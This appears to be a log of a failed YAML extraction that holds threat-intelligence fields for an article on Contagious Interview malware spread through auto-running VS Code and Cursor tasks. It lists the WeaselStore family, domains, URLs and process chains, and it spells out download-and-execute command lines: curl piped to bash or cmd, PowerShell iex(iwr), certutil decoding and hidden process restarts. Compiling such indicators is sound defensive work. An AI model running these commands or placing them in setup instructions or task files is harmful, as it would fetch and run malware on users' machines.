# Failed YAML extraction
# Timestamp: 2026-05-01T21:18:31.202030
# Response length: 2633 chars
# Input chunk preview: '=== ARTICLE BODY ===Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains - Part 12/27/2026 - Note: we have made revisions to this post to clarify findings and separate speculat'
# ============================================================

title: "Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains - Part 12/27/2026"
description: The ASTRO team has been tracking Contagious Interview techniques that abuse task auto-execution in IDEs to deliver malware, with new payload stagers using short URLs, GitHub Gists, Google Drive, and custom domains.
attribution: ""
malware_families:
  - WeaselStore
cves: []
ttps:
  processes:
    - cmd.exe
    - powershell.exe
    - node.exe
    - pythonw.exe
  command_lines:
    - curl -sL https://gist[.]githubusercontent[.]com/cuda-toolkit/0959deda4982736d1c1647cff354c665/raw/metal_pytorch_sim_v2.3.0.sh | bash
    - iex(iwr 'https://gist[.]githubusercontent[.]com/cuda-toolkit/936835c7a98d3b223970a5d2ed63fc97/raw/cuda_toolkit_sim_v12.4.ps1' -UseBasicParsing)
    - curl https://nomgwenya[.]co[.]za/js/settings?win=32 | cmd
  powershell:
    - "{powershell -WindowStyle Hidden -Command \"Start-Process -FilePath cmd.exe -ArgumentList '/c \"%~f0\" _restarted' -WindowStyle Hidden\" & exit /b}"
    - "certutil -f -decode \"%~f0\" \"%TMP_JS%\" >nul 2>&1"
    - "node.exe %TEMP%\script_%RANDOM%.mjs"
    - "pythonw_path, [exec_py_path], {detached: true,stdio: 'ignore',env: { ...process.env, REALTEKAUDIO: process.argv[2], PROCNAME: \"Main\" }});"
  scripts:
    - inject-simple.min0.js
  registry_keys: []
  image_loads: []
  network_connections:
    - curl -> gist[.]githubusercontent[.]com:443
    - iwr -> gist[.]githubusercontent[.]com:443
    - node -> drive[.]google[.]com:443
    - pythonw.exe -> postprocesser[.]com:443
  file_activity:
    - %USERPROFILE%\.vscode\vscode-bootstrap.cmd
    - %TEMP%\script_%RANDOM%.mjs
    - %TEMP%\python3\
  persistence: []
  process_relations:
    - cmd.exe -> powershell.exe
    - powershell.exe -> cmd.exe
iocs:
  hashes: []
  ip_addresses: []
  domains:
    - gist[.]githubusercontent[.]com
    - camdriver[.]pro
    - short[.]gy
    - josehub88[.]vercel[.]app
    - drive[.]google[.]com
    - drive[.]usercontent[.]google[.]com
    - nomgwenya[.]co[.]za
    - postprocesser[.]com
  urls:
    - https://gist[.]githubusercontent[.]com/cuda-toolkit/0959deda4982736d1c1647cff354c665/raw/metal_pytorch_sim_v2.3.0.sh
    - https://gist[.]githubusercontent[.]com/cuda-toolkit/936835c7a98d3b223970a5d2ed63fc97/raw/cuda_toolkit_sim_v12.4.ps1
    - https://nomgwenya[.]co[.]za/js/settings?win=32
    - https://drive[.]google[.]com/file/d/16AaeeVhqj4Q6FlJIDMgdWASJvq7w00Yc/view?usp=sharing
    - https://drive[.]usercontent[.]google[.]com/download?id=${fileId}&export=download&confirm=t
    - hxxps://postprocesser[.]com/.well-known/pki-validation/go/python3.zip
authors: []